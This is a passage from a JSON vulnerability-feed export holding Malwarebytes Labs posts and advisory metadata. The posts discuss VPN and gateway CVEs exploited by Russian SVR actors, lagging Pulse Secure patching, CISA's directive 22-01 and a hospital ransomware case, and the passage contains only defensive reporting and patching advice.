"authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2019-9670", "CVE-2020-4006"], "modified": "2021-06-21T13:53:03", "id": "MALWAREBYTES:BAB94968DD1EC37DA6F977226977DAF5", "href": "https://blog.malwarebytes.com/reports/2021/06/atomic-research-institute-breached-via-vpn-vulnerability/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-04-16T16:30:59", "description": "The National Security Agency (NSA), the Cybersecurity and Infrastructure Security Agency (CISA), and the Federal Bureau of Investigation (FBI) have jointly released a Cybersecurity Advisory called [Russian SVR Targets U.S. and Allied Networks](<https://media.defense.gov/2021/Apr/15/2002621240/-1/-1/0/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF>), to expose ongoing Russian Foreign Intelligence Service (SVR) exploitation of five publicly known vulnerabilities. The advisories' executive summary reads:\n\n> Russian Foreign Intelligence Service (SVR) actors, who are also known under the names APT29, Cozy Bear, and The Dukes frequently use publicly known vulnerabilities to conduct widespread scanning and exploitation against vulnerable systems in an effort to obtain authentication credentials and use those to gain further access. 
This targeting and exploitation encompasses US and allied networks, including national security and government related systems.\n\n### Remarkable mentions in the cybersecurity advisory\n\nReleased alongside the advisory is the US Government\u2019s formal attribution of the [SolarWinds](<https://blog.malwarebytes.com/threat-analysis/2020/12/advanced-cyber-attack-hits-private-and-public-sector-via-supply-chain-software-update/>) supply chain compromise, and the cyber espionage campaign related to it, to Russia.\n\nMentioned are recent SVR activities that include targeting COVID-19 research facilities via [WellMess malware](<https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198c>) and targeting networks through a VMware vulnerability disclosed by NSA.\n\n### Vulnerabilities\n\nNSA, CISA, and the FBI are encouraging organizations to check their networks for Indicators of Compromise (IOCs) related to five vulnerabilities.\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. 
Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services).\n\nThe advisory lists the following CVEs:\n\n * [CVE-2018-13379](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>) as discussed here: [Fortinet FortiGate VPN](<https://www.fortiguard.com/psirt/FG-IR-18-384>)\n * [CVE-2019-9670](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9670>) as discussed here: [Synacor Zimbra Collaboration Suite](<https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories>)\n * [CVE-2019-11510](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510>) as discussed here: [Pulse Secure Pulse Connect Secure VPN](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>)\n * [CVE-2019-19781](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19781>) as discussed here: [Citrix Application Delivery Controller and Gateway](<https://support.citrix.com/article/CTX267027>)\n * [CVE-2020-4006](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-4006>) as discussed here: [VMware Workspace ONE Access](<https://www.vmware.com/security/advisories/VMSA-2020-0027.html>)\n\nWe have added a link to the vendor\u2019s sites where they discuss the vulnerabilities and where you can find how to patch them. 
As you can see most of those are quite old (the first four digits in a CVE ID are the year in which the CVE was issued) and patches have been available for a considerable time.\n\n### General mitigation strategy\n\nWhile some vulnerabilities have specific additional mitigations that you can read about in the items linked in the list above, the advisory hands us the following general mitigations:\n\n * Keep systems and products updated and patch as soon as possible after patches are released since many actors exploit numerous vulnerabilities.\n * Expect that the risk from data stolen or modified (including credentials, accounts, and software) before a device was patched will not be alleviated by patching or simple remediation actions. Assume that a breach will happen, enforce least-privileged access, and make password changes and account reviews a regular practice.\n * Disable external management capabilities and set up an out-of-band management network.\n * Block obsolete or unused protocols at the network edge and disable them in device configurations.\n * Isolate Internet-facing services in a network Demilitarized Zone (DMZ) to reduce exposure of the internal network.\n * Enable robust logging of Internet-facing services and authentication functions. Continuously hunt for signs of compromise or credential misuse, particularly within cloud environments.\n * Adopt a mindset that compromise happens; prepare for incident response activities, only communicate about breaches on out-of-band channels, and take care to uncover a breach\u2019s full scope before remediating.\n\n### Techniques\n\nThe techniques leveraged by SVR actors include:\n\n * **Exploiting public-facing applications**. Adversaries may attempt to take advantage of a weakness in an Internet-facing computer or program using software, data, or commands in order to cause unintended or unanticipated behavior.\n * **Leveraging external remote services**. 
Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms (notably RDP) allow users to connect to internal enterprise network resources from external locations.\n * **Compromising supply chains**. Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise.\n * **Using valid accounts**. Adversaries may obtain and abuse credentials of existing accounts as a means of gaining access or elevating permissions.\n * **Exploiting software for credential access**. Adversaries may exploit software vulnerabilities in an attempt to collect credentials.\n * **Forging web credentials**: SAML tokens. An adversary may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate.\n\nThe items listed under mitigations and techniques probably won't be new to many of the people reading this, but they are a reminder that security, even against nation-state actors, is often a matter of getting some important but mundane things right, over and over again.\n\nStay safe, everyone!\n\nThe post [Patch now! 
NSA, CISA, and FBI warn of Russian intelligence exploiting 5 vulnerabilities](<https://blog.malwarebytes.com/malwarebytes-news/2021/04/patch-now-nsa-cisa-and-fbi-warn-of-russian-intelligence-exploiting-5-vulnerabilities/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.1, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-04-16T14:59:38", "type": "malwarebytes", "title": "Patch now! NSA, CISA, and FBI warn of Russian intelligence exploiting 5 vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2019-9670", "CVE-2020-4006"], "modified": "2021-04-16T14:59:38", "id": "MALWAREBYTES:80B21E934B1C43C7071F039FE9512208", "href": "https://blog.malwarebytes.com/malwarebytes-news/2021/04/patch-now-nsa-cisa-and-fbi-warn-of-russian-intelligence-exploiting-5-vulnerabilities/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2019-10-18T17:31:38", "description": "In April 2019, Pulse Secure published an advisory about a vulnerability in their software. 
In August, cybercriminals were massively scanning for systems that were running a vulnerable version. Now it\u2019s October, and still many organizations have not applied the patches that are available for this vulnerability. \n\nThis is a trend we've seen repeated with dozens of other publicly-known vulnerabilities and organizations that are slow to update software to the latest, most secure versions. \n\nWith so many organizations falling victim to cyberattack via exploited vulnerability, we have to ask: Why aren't people patching?\n\n### What are the vulnerabilities?\n\nReading the above, you might suspect that the vulnerabilities were not serious or hard to exploit. But that's not the impression we get from the Pulse Secure advisory. It states:\n\n> \u201cMultiple vulnerabilities were discovered and have been resolved in Pulse Connect Secure (PCS) and Pulse Policy Secure (PPS). This includes an authentication by-pass vulnerability that can allow an unauthenticated user to perform a remote arbitrary file access on the Pulse Connect Secure gateway. This advisory also includes a remote code execution vulnerability that can allow an authenticated administrator to perform remote code execution on Pulse Connect Secure and Pulse Policy Secure gateways.\u201d\n\nPulse Connect Secure is a VPN solution for organizations and offers remote users a secure connection to the corporate network so they can remotely log in and work. Pulse Policy Secure is a well-known Network Access Control solution, which does not only control who can connect but also assigns the appropriate permissions.\n\nWhen it comes to software like this, an authentication by-pass vulnerability is a serious problem. Any criminal with the proper knowledge can pretend to be an employee and access company resources. 
In this case, https access and the use of an especially-prepared URL would be enough to read an arbitrary file on a vulnerable system.\n\nNeedless to say, that is a serious problem\u2014and we haven\u2019t even touched on the remote code execution possibility. Every hacker's dream is to be able to run their code on your system. That gives them a foothold within your network from which they can expand their activities. They can plant ransomware or whatever else they fancy.\n\n### Where would they get the necessary knowledge\n\nBy design, many cybercriminals are opportunistic, and they will jump at any easy copy-and-paste job that renders enough cash. So, when the vulnerability was discussed elaborately at Black Hat in early August, the method to exploit the vulnerability became general knowledge. \n\nSince using this method hardly requires expert knowledge, researchers soon noticed a lot of scanning activity by cybercriminals looking for vulnerable systems. The vulnerability in Pulse Secure was presented along with a [few vulnerabilities in other SSL VPN products](<https://www.blackhat.com/us-19/briefings/schedule/#infiltrating-corporate-intranet-like-nsa---pre-auth-rce-on-leading-ssl-vpns-15545>). Shortly after, an exploit for this vulnerability was published on GitHub, so every copycat could have it handy.\n\n### Unpatched\n\nOn Saturday, August 24, 2019, scans performed by [Bad Packets](<https://badpackets.net/over-14500-pulse-secure-vpn-endpoints-vulnerable-to-cve-2019-11510/>) found a total of 14,528 Pulse Secure VPN endpoints vulnerable to CVE-2019-11510. Over 5,000 of those were in the US, including military, federal, state, and local government agencies. \n\nA week later, 10,471 Pulse Secure VPN servers worldwide remained vulnerable to compromise. On Monday, September 16, 2019, there were still 7,712 left to be patched. 
On Monday, October 7, 2019, a surprising 6,018 remained, with a lot of active scanning going on\u2014and this was after advisories have been issued by the NSA and the NCSC.\n\n### Responsibility\n\nA basic question in cases like these is: Who is responsible for applying patches? Without doubt, we expect a vendor to develop a patch as soon as the vulnerability is made known to them, but what happens after that? \n\nIndustry leaders have long warned that vulnerability remediation and effective patch management are essential to keep organizations safe from cyberattacks. But there are a few essential steps in the delivery chain after the patch is released:\n\n * Customers need to be made aware of the patch and the required urgency.\n * Security providers or resellers need to make sure their customers are aware of the existence of the patch and the possible consequences of not applying it.\n * Organizations need to have a department or external provider that is responsible for keeping the security software updated. Spending money on top-notch software and then leaving it unattended is a sure waste of money. Keeping software in shape is not limited to applying patches, but security patches can sometimes be more important than fetching the latest rules update.\n\nThe natural next question, then, is why aren't organizations applying patches as soon as they know about them? \n\n* * *\n\n_Recommended reading: _[Tackling the shortage in skilled IT staff: whole team security](<https://blog.malwarebytes.com/security-world/business-security-world/2019/02/tackling-the-shortage-in-skilled-it-staff-whole-team-security/>)\n\n* * *\n\n### So, what\u2019s stopping them from applying the patch?\n\nAssuming that an organization's IT or security team is aware of the patch, possible reasons for holding off might be fear of disrupted processes or a possible disagreement on what they might regard as critical. 
But the possible consequences of an unpatched critical vulnerability should heavily outweigh those concerns. \n\nThere could be several other reasons for not applying patches as soon as they are available:\n\n * Understaffed IT and security teams \n * Looking into the consequences first, which could slow down the process due to lack of feedback\n * Waiting for others to share their experiences before applying patches \n * Unaware of the patch's existence, sometimes as a result of not having time to follow up on emails and warning signs\n * Lack of a point of contact. Whose problem is it? And whose job is to solve it?\n\nAs you can see, most of these can be traced back to a lack of staff and time, and sometimes funding is responsible for those two shortages. But sometimes understaffing is because of [other reasons.](<https://blog.malwarebytes.com/security-world/2018/06/whats-causing-the-cybersecurity-skills-gap/>) And once you are understaffed, the lack of time to follow up on problems comes as a logical consequence.\n\n### The Pulse vulnerability is not alone\n\nIt\u2019s not like the Pulse vulnerability is the only VPN-related vulnerability out there (or any software vulnerability, for that matter). Similar problems are known to exist in products from Fortinet and Palo Alto. \n\nIn an [advisory](<https://www.ncsc.gov.uk/news/alert-vpn-vulnerabilities>) from the National Cyber Security Center (NCSC) in the UK, users of the affected VPN products can find specified log entries to look for signs of a compromise or attempt to compromise. They also emphasize the need for patching: \n\n> \u201cSecurity patches should always be applied promptly. More guidance is available on the NCSC website. 
The NCSC acknowledges that patching is not always straightforward and in some cases can cause business disruption, but it remains the single most important step an organisation or individual can take to protect itself.\u201d\n\nSo, the question remains: If organizations are aware of the patch and have the staff resources to apply it, why are so many dragging their feet? Maybe some of our readers can shed some light on this mystery. Feel free to share your personal experiences in the comments. \n\nThe post [Pulse VPN patched their vulnerability, but businesses are trailing behind](<https://blog.malwarebytes.com/business-2/2019/10/pulse-vpn-patched-their-vulnerability-but-businesses-are-trailing-behind/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2019-10-18T16:36:36", "type": "malwarebytes", "title": "Pulse VPN patched their vulnerability, but businesses are trailing behind", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510"], "modified": "2019-10-18T16:36:36", "id": 
"MALWAREBYTES:5B32671B820EEB03840B798BCEA9FDC8", "href": "https://blog.malwarebytes.com/business-2/2019/10/pulse-vpn-patched-their-vulnerability-but-businesses-are-trailing-behind/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-04T22:43:41", "description": "The Cybersecurity and Infrastructure Security Agency (CISA) has issued binding directive 22-01 titled [Reducing the Significant Risk of Known Exploited Vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities>). This directive applies to all software and hardware found on federal information systems managed on agency premises or hosted by third-parties on an agency\u2019s behalf.\n\nOne of the most welcomed of the required actions set forth in the directive is that CISA will keep a [catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) of vulnerabilities alongside timeframes in which they must be remediated. According to the plan, this catalog will list only the most important vulnerabilities that have proven to pose the biggest risks.\n\n### The scope\n\nIn the US, a binding operational directive is an instruction that federal, executive branch, departments and agencies have to follow. They also provide a strong indication of the kind of cybersecurity measures that CISA thinks are important, which other organizations may wish to follow. (It's also easy to imagine that what's required of federal agencies today may be required of the vast web of suppliers to federal agencies tomorrow.)\n\nTo that end, CISA strongly recommends that private businesses and state, local, tribal, and territorial (SLTT) governments review and monitor its catalog. 
CISA has done the hard work of identifying what should be patched first, and anyone who follows its guidance is likely to find their security and resilience posture improved.\n\n### The reason\n\nIt will come as no surprise that the continued cyberattacks against US entities are the reason for this directive: "The United States faces persistent and increasingly sophisticated malicious cyber campaigns that threaten the public sector, the private sector, and ultimately the American people\u2019s security and privacy.\u201d\n\nMany of the attacks against US organizations rely on vulnerabilities that could have been patched months or even years ago, but haven't been. For example, earlier this year CISA issued a joint advisory with the FBI and NSA urging US organizations to patch [five old vulnerabilities](<https://blog.malwarebytes.com/malwarebytes-news/2021/04/patch-now-nsa-cisa-and-fbi-warn-of-russian-intelligence-exploiting-5-vulnerabilities/>) from 2018 and 2019 that were regularly exploited by the Russian Foreign Intelligence Service.\n\nThe idea is that better patch management, supported by the prioritization provided by the CISA catalog, can prevent future attacks.\n\n### The rules\n\nThe required actions are pretty simple and straightforward\u2014to read at least. Execution of the rules may prove to be more difficult. The rules are:\n\n * **Plan**. Organizations have 60 days to come up with a vulnerability management plan.\n * **Execute**. CISA is giving notice that the clock is running on vulnerabilities it cares about. The affected departments and agencies have six months to fix anything with a CVE issued before 2021, and two weeks to fix everything else.\n * **Report**. Organizations have to report on the status of vulnerabilities through the Continuous Diagnostics and Mitigation (CDM) Federal Dashboard.\n\nWhile 6 months may seem a long time for the CVE\u2019s prior to 2021, that doesn\u2019t mean they are less important than this year's vulnerabilities. 
The grace period may reflect the difficulty that organizations have already had in fixing older bugs, or the fact that "everything prior to 2021" is just a much longer period of time than the ten months of 2021. After six months is up and all those vulnerabilities are fixed, presumably everyone will be on a much shorter lease, with just two weeks to fix anything CISA deems serious enough to put on its list.\n\nIn some cases the catalog already lists a vulnerability with a due date in the past, such as [CVE-2019-11510](<https://blog.malwarebytes.com/business-2/2019/10/pulse-vpn-patched-their-vulnerability-but-businesses-are-trailing-behind/>). In August, 2019, scans performed by Bad Packets found a total of 14,528 Pulse Secure VPN endpoints vulnerable to CVE-2019-11510, four months after a patch became available. Over 5,000 of those were in the US, including military, federal, state, and local government agencies\u2014and this was after advisories had been issued by the NSA and the NCSC.\n\nThe notes column for this CVE references [CISA's ED 21-03](<https://cyber.dhs.gov/ed/21-03/>) for further guidance and requirements. In that Emergency Directive you will find the due date of April 23rd of 2021. So, it was already required to be patched for organizations that are bound to follow emergency directives.\n\n### Patch management\n\nBecause patch management has proven to be a challenge, having a catalog to fall back on when you are looking for prioritization rules can be very helpful. On the other hand, by telling organizations what needs to be done, inadvertently they may skip necessary patches, simply because they were not listed. Or worse, they were listed but the people responsible for patching didn\u2019t find them.\n\nEither way, if this is a first step in setting up a compliance program, where all the vulnerabilities that are used in the wild get patched within two weeks, we will certainly welcome it. 
We have seen the impact of, for example, the [disclosure rules](<https://googleprojectzero.blogspot.com/2021/04/policy-and-disclosure-2021-edition.html>) set forth by Google\u2019s Project Zero on the generally accepted rules for [responsible](<https://en.wikipedia.org/wiki/Responsible_disclosure>)[ disclosure](<https://en.wikipedia.org/wiki/Responsible_disclosure>), and would love to see this directive have a similar effect on the average patching speed.\n\nStay safe, everyone!\n\nThe post [CISA sets two week window for patching serious vulnerabilities](<https://blog.malwarebytes.com/reports/2021/11/cisa-sets-two-week-window-for-patching-serious-vulnerabilities/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-11-04T21:23:02", "type": "malwarebytes", "title": "CISA sets two week window for patching serious vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510"], "modified": "2021-11-04T21:23:02", "id": "MALWAREBYTES:6ECB9DE9A2D8D714DB50F19BAF7BF3D4", "href": 
"https://blog.malwarebytes.com/reports/2021/11/cisa-sets-two-week-window-for-patching-serious-vulnerabilities/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-08T17:44:01", "description": "A recent ransomware attack which played a significant role in the death of a German woman has put into focus both the dangers and the importance of cybersecurity today. But it has also led some to point fingers as to who was responsible. \n\nAs usual, playing the blame game helps no one, but it does remind us of the dire need to work on healthcare security.\n\n### What happened?\n\nA few weeks ago, the university hospital Uniklinikum in the German city of D\u00fcsseldorf suffered a ransomware attack. The hospital decided not to admit new patients until it resolved the situation and restored normal operations.\n\nBecause of the admissions stop, a woman in need of immediate help had to be driven to the hospital of Wuppertal which is about 20 miles further. Unfortunately, she died upon arrival. The extra 30 minutes it took to get her to the next hospital turned out to be fatal. \n\nAs it turned out, the target of the ransomware gang was not even the hospital, but the university the hospital belongs to. When the attackers learned that the hospital had fallen victim as well, they handed over the decryption key for free. Despite that key, it took the hospital more than two weeks to reach a level of operability that allowed them to take on new patients. 
\n\nThis is not only tragic because the woman might have been saved if the university hospital had been operational, but also because it demonstrates once more how one of the most important parts of our infrastructure is lacking adequate defenses against prevalent threats like ransomware.\n\n### What are the main problems facing healthcare security?\n\nIn the past we have identified several elements that make the healthcare industry, and hospitals in particular, more vulnerable to cyberthreats than many other verticals. \n\nHere are some of those problem elements:\n\n * The Internet of Things (IoT): Due to their nature and method of use, you will find a lot of IoT devices in hospitals that all run on different operating systems and require specific security settings in order to shield them from the outside world.\n * Legacy systems: Quite often, older equipment will not run properly under newer operating systems, which results in several systems that are running on an outdated OS and even on software that has reached the [end-of-life point](<https://blog.malwarebytes.com/awareness/2020/03/windows-7-is-eol-what-next/>). This means that the software will no longer receive patches or updates even when there are known issues.\n * Lack of adequate backups: Even when the underlying problem has been resolved, it can take far too long for an attacked target to get back to an operational state. Institutes need to at least have a backup plan and maybe even backup equipment and servers for the most vital functions so they can keep them running when disaster strikes.\n * Extra stressors: Additional issues like COVID-19, fires, and other natural disasters can cut time and push aside the need to perform updates, make backups, or think about anything cybersecurity related. 
These stressors and other reasons are often referred to as "we have more important things to do."\n\n### IoT security risks\n\nMany medical devices that investigate and monitor the patient are connected to the internet. We consider them to be part of the [Internet of Things (IoT)](<https://blog.malwarebytes.com/101/2017/12/internet-things-iot-security-never/>). This group of devices comes with its own set of security risks, especially when it comes to [personally identifiable information (PII)](<https://blog.malwarebytes.com/security-world/2019/04/what-is-personal-information-in-legal-terms-it-depends/>). \n\nIn every case it is advisable to investigate whether a device\u2019s settings allow it to be reached over the intranet instead of the internet. If possible, that makes it easier to shield the device from unauthorized access and keep the sensitive data inside the security perimeter.\n\n### Legacy systems\n\nMedical systems come from various suppliers and in any hospital you will find many different types, each with its own goal, user guide, and updating regime. For many legacy systems, the acting rule of thumb will be not to tinker with it if it works. The fear of a system failure outweighs the urgency to install the latest patches. And we can relate to that state of mind except when applied to security updates on a connected system.\n\n### Disaster stress\n\nOkay, here comes our umpteenth mention of COVID-19\u2014I know, but it is a factor that we can\u2019t ignore. \n\nThe recent global pandemic contributes to the lack of time that IT staff at many healthcare organizations feel they have. The same is true for many other disasters that require emergency solutions to be set up. 
\n\nIn some cases, entire specialized clinics were built to deal with COVID-19 victims, and to replace lost capacity in other disasters like wildfires and earth slides.\n\n### More important matters at hand?\n\nIt's difficult to overstate the importance of "triage" in the healthcare system. Healthcare professionals like nurses and doctors likely practice it every day, prioritizing the most critical patient needs on a second-by-second basis. \n\nIt should serve as no surprise that triaging has a place in IT administration, too. Healthcare facilities should determine which systems require immediate attention and which systems can wait. \n\nInterestingly, the CISO of the hospital which suffered from the ransomware attack was accused of negligence in some German media. Law enforcement in Germany is moving forward with both trying to identify the individuals behind the ransomware attack, as well as potentially charging them with negligent manslaughter because of the woman's death. \n\nWhile we can hardly blame the CISO for the woman\u2019s death, there may come a time when inadequate security and its results may carry punishment for those responsible.\n\n### Ransomware in particular\n\nThe ransomware at play in the German case was identified as DoppelPaymer and it was determined to be planted inside the organization using the [CVE-2019-19781](<https://support.citrix.com/article/CTX267027>) vulnerability in Citrix VPNs. \n\nIn more recent news, we learned that [UHS hospitals](<https://www.bleepingcomputer.com/news/security/uhs-hospitals-hit-by-reported-country-wide-ryuk-ransomware-attack/>) in the US were hit by [Ryuk ransomware](<https://blog.malwarebytes.com/detections/ransom-ryuk/>). \n\nIt's also important to remember that the costs of a [ransomware attack ](<https://www.malwarebytes.com/ransomware/>)are often underestimated. People tend to look only at the actual ransom amount demanded, but the additional costs are often much higher than that. 
\n\nIt takes many people-hours to restore all the affected systems in an organization and return to a fully operational state. The time to recover will be lower in an organization that comes prepared. Having a restoration plan and adequate backups that are easy to deploy can streamline the process of getting back in business. Another important task is to figure out how it happened and how to plug the hole, so it won\u2019t happen again. Also, a thorough investigation may be necessary to check whether the attacker did not leave any [backdoors ](<https://www.malwarebytes.com/backdoor/>)behind.\n\n### There\u2019s a problem for every solution\n\nSecurity will probably never reach a watertight quality, so besides making our infrastructure, especially the vital parts of it, as secure as possible, we also need to think ahead and make plans to deal with a breach. Whether it\u2019s a data breach or an attack that cripples important parts of our systems, we want to be prepared. Knowing what to do\u2014and in what order\u2014can save a lot of time in disaster recovery. Having the tools and backups at hand is the second step in limiting the damages and help with a speedy recovery.\n\nTo sum it up, you are going to need:\n\n * Recovery plans for different scenarios: [data breaches](<https://www.malwarebytes.com/data-breach/>), ransomware attacks, you name it\n * File backups that are recent and easy to deploy or another type of rollback method\n * Backup systems that can take over when critical systems are crippled\n * Training for those involved, or at least an opportunity to familiarize them with the steps of the recovery plans\n\nAnd last but not least, don\u2019t forget to focus on prevention. 
The best thing about a recovery plan is when you never need it.\n\nStay safe, everyone!\n\nThe post [Healthcare security update: death by ransomware, what's next?](<https://blog.malwarebytes.com/business-2/2020/10/healthcare-security-death-by-ransomware/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-08T15:30:00", "type": "malwarebytes", "title": "Healthcare security update: death by ransomware, what\u2019s next?", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-10-08T15:30:00", "id": "MALWAREBYTES:D7EFF87E8AB1DBEC63A0DBE7F8DA90B8", "href": "https://blog.malwarebytes.com/business-2/2020/10/healthcare-security-death-by-ransomware/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T11:19:47", "description": "A file disclosure vulnerability exists in Pulse Connect Secure. 
Successful exploitation of this vulnerability would allow a remote attacker to list directories on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2019-09-04T00:00:00", "type": "checkpoint_advisories", "title": "Pulse Connect Secure File Disclosure (CVE-2019-11510)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510"], "modified": "2019-09-04T00:00:00", "id": "CPAI-2019-1097", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-17T11:17:58", "description": "A directory traversal vulnerability exists in multiple Citrix products. 
